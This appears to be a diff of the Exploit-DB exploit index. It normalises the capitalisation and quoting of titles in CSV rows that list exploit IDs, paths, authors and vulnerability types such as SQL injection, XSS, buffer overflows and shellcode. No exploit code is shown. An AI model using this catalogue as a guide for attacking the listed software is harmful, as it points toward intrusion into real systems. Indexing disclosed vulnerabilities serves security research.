25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0 -25327,platforms/php/webapps/25327.txt,"AlstraSoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0 -25328,platforms/php/webapps/25328.txt,"AlstraSoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 +25327,platforms/php/webapps/25327.txt,"Alstrasoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0 +25328,platforms/php/webapps/25328.txt,"Alstrasoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 25329,platforms/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",windows,dos,0 25330,platforms/php/webapps/25330.txt,"phpMyAdmin 2.x - Convcharset Cross-Site Scripting",2005-04-03,"Oriol Torrent Santiago",php,webapps,0 25331,platforms/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 - Web Interface Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps,0 @@ -22501,7 +22502,7 @@ id,file,description,date,author,platform,type,port 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 - GR_OSView Information Disclosure",2005-04-07,anonymous,irix,local,0 25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 - GR_OSView Local Arbitrary File Overwrite",2005-04-07,anonymous,irix,local,0 -25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM Buffer Overflow (UNICODE) Overwrite SEH",2013-05-11,ariarat,windows,dos,0 +25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM Buffer Overflow 'UNICODE' Overwrite SEH",2013-05-11,ariarat,windows,dos,0 25364,platforms/windows/dos/25364.txt,"AN HTTPD - CMDIS.dll Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - OP Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 @@ -22540,14 +22541,14 @@ id,file,description,date,author,platform,type,port 25399,platforms/php/webapps/25399.txt,"PHPBB2 Plus 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 25400,platforms/php/webapps/25400.txt,"PHPBB2 Plus 1.5 - Portal.php Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 25401,platforms/php/webapps/25401.txt,"PHPBB2 Plus 1.5 - viewtopic.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 -25402,platforms/hardware/dos/25402.txt,"LG U8120 Mobile Phone - .MIDI File Remote Denial of Service",2005-04-13,"Luca Ercoli",hardware,dos,0 +25402,platforms/hardware/dos/25402.txt,"LG U8120 Mobile Phone - '.MIDI' File Remote Denial of Service",2005-04-13,"Luca Ercoli",hardware,dos,0 25403,platforms/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - Album_Cat.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25404,platforms/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25405,platforms/php/webapps/25405.txt,"GetSimpleCMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",php,webapps,0 25406,platforms/linux/local/25406.sh,"Kloxo 6.1.6 - Privilege Escalation",2013-05-13,HTP,linux,local,0 -25408,platforms/windows/dos/25408.pl,"Windows Media Player 11.0.0 - '.wav' Crash (PoC)",2013-05-13,Asesino04,windows,dos,0 +25408,platforms/windows/dos/25408.pl,"Microsoft Windows Media Player 11.0.0 - '.wav' Crash (PoC)",2013-05-13,Asesino04,windows,dos,0 25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 -25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster - 'index.php id parameter' SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 +25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster - 'index.php id Parameter' SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0 25412,platforms/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 @@ -22557,7 +22558,7 @@ id,file,description,date,author,platform,type,port 25417,platforms/ios/webapps/25417.txt,"File Lite 3.3 & 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25418,platforms/windows/dos/25418.py,"MiniWeb MiniWeb HTTP Server (build 300) - Crash (PoC)",2013-05-13,dmnt,windows,dos,0 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0 -25420,platforms/multiple/remote/25420.txt,"IBM WebSphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote,0 +25420,platforms/multiple/remote/25420.txt,"IBM Websphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote,0 25421,platforms/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Cross-Site Scripting",2005-04-15,"Oliver Karow",windows,remote,0 25422,platforms/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 - 'index.php' Arbitrary Remote File Inclusion",2005-04-14,"Francisco Alisson",php,webapps,0 25423,platforms/php/webapps/25423.txt,"SPHPBlog 0.4 - search.php Cross-Site Scripting",2005-04-14,y3dips,php,webapps,0 @@ -22577,14 +22578,14 @@ id,file,description,date,author,platform,type,port 25437,platforms/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php' cats_app Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 25439,platforms/multiple/dos/25439.c,"Multiple Vendor - TCP Session Acknowledgement Number Denial of Service",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos,0 -25440,platforms/php/webapps/25440.txt,"Wordpress wp-FileManager Plugin - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 +25440,platforms/php/webapps/25440.txt,"WordPress wp-FileManager Plugin - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x? / 2.x / 3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 -25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id parameter) SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 +25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id Parameter) SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow (SEH)",2013-05-14,ariarat,windows,dos,0 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1)",2013-05-14,sd,linux,local,0 25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC - SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,Metasploit,multiple,remote,8000 25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC - SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,Metasploit,multiple,remote,8000 -25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 +25447,platforms/php/webapps/25447.txt,"Alienvault OSSIM 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 - ERS File Handling Buffer Overflow",2013-05-14,Metasploit,windows,local,0 25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 @@ -22601,11 +22602,11 @@ id,file,description,date,author,platform,type,port 25465,platforms/linux/dos/25465.txt,"Logwatch 2.6 Secure Script - Denial of Service",2005-04-20,anonymous,linux,dos,0 25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/login.asp SQL Injection",2005-04-20,c0d3r,asp,webapps,0 25467,platforms/php/webapps/25467.txt,"Netref 4.2 - Cat_for_gen.php Remote PHP Script Injection",2005-04-20,jaguar,php,webapps,0 -25468,platforms/php/webapps/25468.txt,"PHP Labs - .proFile Dir URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 +25468,platforms/php/webapps/25468.txt,"PHP Labs - '.proFile' Dir URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 - Admin Form SQL Injection",2005-04-20,Zinho,php,webapps,0 25470,platforms/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service",2005-04-20,"Adam Baldwin",multiple,dos,0 25472,platforms/windows/dos/25472.py,"Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service",2013-05-15,Sapling,windows,dos,0 -25473,platforms/php/webapps/25473.txt,"PHP Labs - .proFile File URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 +25473,platforms/php/webapps/25473.txt,"PHP Labs - '.proFile' File URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25474,platforms/php/webapps/25474.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 25475,platforms/php/webapps/25475.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 - default.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 @@ -22631,7 +22632,7 @@ id,file,description,date,author,platform,type,port 25496,platforms/php/webapps/25496.txt,"PHP-Charts 1.0 - Code Execution",2013-05-17,"fizzle stick",php,webapps,0 25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 25498,platforms/asp/webapps/25498.txt,"ASPNuke 0.80 - Comments.asp SQL Injection",2005-04-22,Dcrab,asp,webapps,0 -25499,platforms/linux/dos/25499.py,"nginx 1.3.9-1.4.0 - Denial of Service (PoC)",2013-05-17,"Mert SARICA",linux,dos,0 +25499,platforms/linux/dos/25499.py,"Nginx 1.3.9-1.4.0 - Denial of Service (PoC)",2013-05-17,"Mert SARICA",linux,dos,0 25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 - detail.asp SQL Injection",2005-04-22,Dcrab,asp,webapps,0 25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 - profile.asp Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 - Select.asp Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 @@ -22643,7 +22644,7 @@ id,file,description,date,author,platform,type,port 25508,platforms/asp/webapps/25508.txt,"CartWIZ 1.10 - ProductDetails.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25509,platforms/asp/webapps/25509.txt,"CartWIZ 1.10 - searchresults.asp PriceTo Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25510,platforms/asp/webapps/25510.txt,"CartWIZ 1.10 - searchresults.asp PriceFrom Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25511,platforms/asp/webapps/25511.txt,"CartWIZ 1.10 - searchresults.asp IDCategory Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25511,platforms/asp/webapps/25511.txt,"CartWIZ 1.10 - searchresults.asp idcategory Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25512,platforms/asp/webapps/25512.txt,"CartWIZ 1.10 - TellAFriend.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25513,platforms/asp/webapps/25513.txt,"CartWIZ 1.10 - AddToWishlist.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25514,platforms/asp/webapps/25514.txt,"CartWIZ 1.10 - Access.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 @@ -22659,14 +22660,14 @@ id,file,description,date,author,platform,type,port 25524,platforms/php/webapps/25524.txt,"phpBB 2.0.x - viewtopic.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 25525,platforms/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (1)",2005-04-25,kf,linux,dos,0 25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (2)",2005-04-25,kf,linux,remote,0 -25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow",2005-04-25,"Damian Put",linux,dos,0 +25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x - '.PNM' Image Decoding Remote Buffer Overflow",2005-04-25,"Damian Put",linux,dos,0 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - PMS.php Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - default.asp Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Include",2005-04-26,"Max Cerny",php,webapps,0 25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 25533,platforms/php/webapps/25533.txt,"Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 -25534,platforms/php/webapps/25534.txt,"SQWebmail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 +25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 - StrCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 @@ -22697,7 +22698,7 @@ id,file,description,date,author,platform,type,port 25562,platforms/multiple/remote/25562.txt,"Oracle Application Server 9i - Webcache Cache_dump_file Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25563,platforms/multiple/remote/25563.txt,"Oracle Application Server 9i - Webcache PartialPageErrorPage Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25564,platforms/php/webapps/25564.txt,"Just William's Amazon Webstore - CurrentIsExpanded Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 -25565,platforms/php/webapps/25565.txt,"Just William's Amazon Webstore - SearchFor Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 +25565,platforms/php/webapps/25565.txt,"Just William's Amazon Webstore - searchFor Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25566,platforms/php/webapps/25566.txt,"Just William's Amazon Webstore - CurrentNumber Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25567,platforms/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,php,webapps,0 25568,platforms/php/webapps/25568.txt,"PHPCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 @@ -22715,12 +22716,12 @@ id,file,description,date,author,platform,type,port 25580,platforms/php/webapps/25580.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - news_view.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 25720,platforms/php/webapps/25720.txt,"Vanilla Forums 2.0.18.8 - Multiple Vulnerabilities",2013-05-26,"Henry Hoggard",php,webapps,0 25584,platforms/multiple/dos/25584.txt,"Mtp-Target Server 1.2.2 - Memory Corruption",2005-05-02,"Luigi Auriemma",multiple,dos,0 -25585,platforms/asp/webapps/25585.txt,"MaxWebPortal 1.3 - dl_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25586,platforms/asp/webapps/25586.txt,"MaxWebPortal 1.3 - links_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25587,platforms/asp/webapps/25587.txt,"MaxWebPortal 1.3 - pic_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25588,platforms/asp/webapps/25588.txt,"MaxWebPortal 1.3 - dl_toprated.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25589,platforms/asp/webapps/25589.txt,"MaxWebPortal 1.3 - custom_link.asp Multiple Parameter SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25590,platforms/php/webapps/25590.txt,"OSTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 +25585,platforms/asp/webapps/25585.txt,"Maxwebportal 1.3 - dl_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25586,platforms/asp/webapps/25586.txt,"Maxwebportal 1.3 - links_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25587,platforms/asp/webapps/25587.txt,"Maxwebportal 1.3 - pic_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25588,platforms/asp/webapps/25588.txt,"Maxwebportal 1.3 - dl_toprated.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25589,platforms/asp/webapps/25589.txt,"Maxwebportal 1.3 - custom_link.asp Multiple Parameter SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25590,platforms/php/webapps/25590.txt,"osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25591,platforms/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25592,platforms/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting",2005-05-03,dr_insane,cgi,webapps,0 25593,platforms/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 - Act Parameter Cross-Site Scripting",2005-05-03,"arron ward",php,webapps,0 @@ -22728,19 +22729,19 @@ id,file,description,date,author,platform,type,port 25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - Defer.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - Details.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 - ActiveX Control SRC Information Disclosure",2005-05-04,"Robert Fly",windows,remote,0 -25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 -25599,platforms/php/webapps/25599.txt,"interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 +25598,platforms/osx/remote/25598.txt,"Apple Mac OS X 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 +25599,platforms/php/webapps/25599.txt,"Interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0 25601,platforms/php/webapps/25601.txt,"FishCart 3.1 - display.php nlst Parameter Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 25602,platforms/php/webapps/25602.txt,"FishCart 3.1 - upstracking.php Multiple Parameter Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 25603,platforms/php/webapps/25603.txt,"FishCart 3.1 - display.php psku Parameter SQL Injection",2005-05-04,Dcrab,php,webapps,0 25604,platforms/php/webapps/25604.txt,"FishCart 3.1 - upstnt.php cartid Parameter SQL Injection",2005-05-04,Dcrab,php,webapps,0 -25605,platforms/php/webapps/25605.txt,"Wordpress ProPlayer Plugin 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",php,webapps,0 +25605,platforms/php/webapps/25605.txt,"WordPress ProPlayer Plugin 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",php,webapps,0 25606,platforms/php/webapps/25606.py,"Kimai 0.9.2.1306-3 - SQL Injection",2013-05-21,drone,php,webapps,0 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Local Code Execution Buffer Overflow",2013-05-21,xis_one,windows,local,0 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,Metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h - OS Command Injection",2013-05-21,Metasploit,hardware,remote,80 -25611,platforms/windows/dos/25611.txt,"Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 +25611,platforms/windows/dos/25611.txt,"Microsoft Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 - Parameter Multiple Remote File Inclusion",2007-05-28,"Hasadya Raed",php,webapps,0 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 - 'index.php' Cross-Site Scripting",2005-06-14,An0nym0uS,php,webapps,0 @@ -22748,7 +22749,7 @@ id,file,description,date,author,platform,type,port 25823,platforms/php/webapps/25823.txt,"McGallery 1.0/1.1 - Lang Argument File Disclosure",2005-06-15,D_BuG,php,webapps,0 25824,platforms/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",php,webapps,0 25825,platforms/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",php,webapps,0 -25612,platforms/php/webapps/25612.txt,"myBloggie 2.1 - 'index.php' year Parameter Cross-Site Scripting",2005-05-05,"Alberto Trivero",php,webapps,0 +25612,platforms/php/webapps/25612.txt,"MyBloggie 2.1 - 'index.php' year Parameter Cross-Site Scripting",2005-05-05,"Alberto Trivero",php,webapps,0 25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0 25614,platforms/php/webapps/25614.txt,"MidiCart PHP - Search_List.php SearchString Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 25615,platforms/php/webapps/25615.txt,"MidiCart PHP - Item_List.php MainGroup Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 @@ -22756,7 +22757,7 @@ id,file,description,date,author,platform,type,port 25617,platforms/php/webapps/25617.txt,"MidiCart PHP - Item_Show.php Code_No Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0 25618,platforms/php/webapps/25618.txt,"MidiCart PHP - Search_List.php SearchString Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 25619,platforms/php/webapps/25619.txt,"MidiCart PHP - Item_List.php SecondGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 -25620,platforms/php/webapps/25620.txt,"MidiCart PHP - Item_List.php Maingroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 +25620,platforms/php/webapps/25620.txt,"MidiCart PHP - Item_List.php MainGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote,0 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - Admin.cgi EntryID Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - OUT.php SQL Injection",2005-05-06,Kold,php,webapps,0 @@ -22766,7 +22767,7 @@ id,file,description,date,author,platform,type,port 25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload",2005-05-06,tjomi4,php,remote,0 25628,platforms/jsp/webapps/25628.txt,"phpBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0 25629,platforms/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 - FTP Commands Remote Buffer Overflow",2008-05-08,Samsta,windows,dos,0 -25630,platforms/php/webapps/25630.txt,"Advanced GuestBook 2.3.1/2.4 - 'index.php' Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 +25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php' Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 25631,platforms/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 - CGISSI.exe Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",windows,dos,0 25632,platforms/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps,0 25633,platforms/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x - Smiley Icon Location Remote Denial of Service",2005-05-09,fjlj@wvi.com,windows,dos,0 @@ -22787,7 +22788,7 @@ id,file,description,date,author,platform,type,port 25648,platforms/cgi/remote/25648.txt,"neteyes nexusway border gateway - Multiple Vulnerabilities",2005-05-11,pokley,cgi,remote,0 25649,platforms/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 - Multiple Vulnerabilities",2011-05-11,dr_insane,cgi,webapps,0 25650,platforms/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 - 'index.php' Cross-Site Scripting",2005-05-11,Lostmon,php,webapps,0 -25651,platforms/asp/webapps/25651.txt,"MaxWebPortal 1.3x - post.asp Multiple Parameter Cross-Site Scripting",2005-05-11,Zinho,asp,webapps,0 +25651,platforms/asp/webapps/25651.txt,"Maxwebportal 1.3x - post.asp Multiple Parameter Cross-Site Scripting",2005-05-11,Zinho,asp,webapps,0 25652,platforms/windows/remote/25652.txt,"APG Technology ClassMaster - Unauthorized Folder Access",2005-05-12,"Alex Garrett",windows,remote,0 25653,platforms/php/webapps/25653.txt,"DirectTopics 2 - topic.php SQL Injection",2005-05-12,"Morinex Eneco",php,webapps,0 25654,platforms/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 - viewforum.php Cross-Site Scripting",2005-05-13,"Morinex Eneco",php,webapps,0 @@ -22798,8 +22799,8 @@ id,file,description,date,author,platform,type,port 25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - Start-Page.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0 -25662,platforms/php/webapps/25662.txt,"Skull-Splitter GuestBook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 -25663,platforms/php/webapps/25663.txt,"Shop-Script - CategoryID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 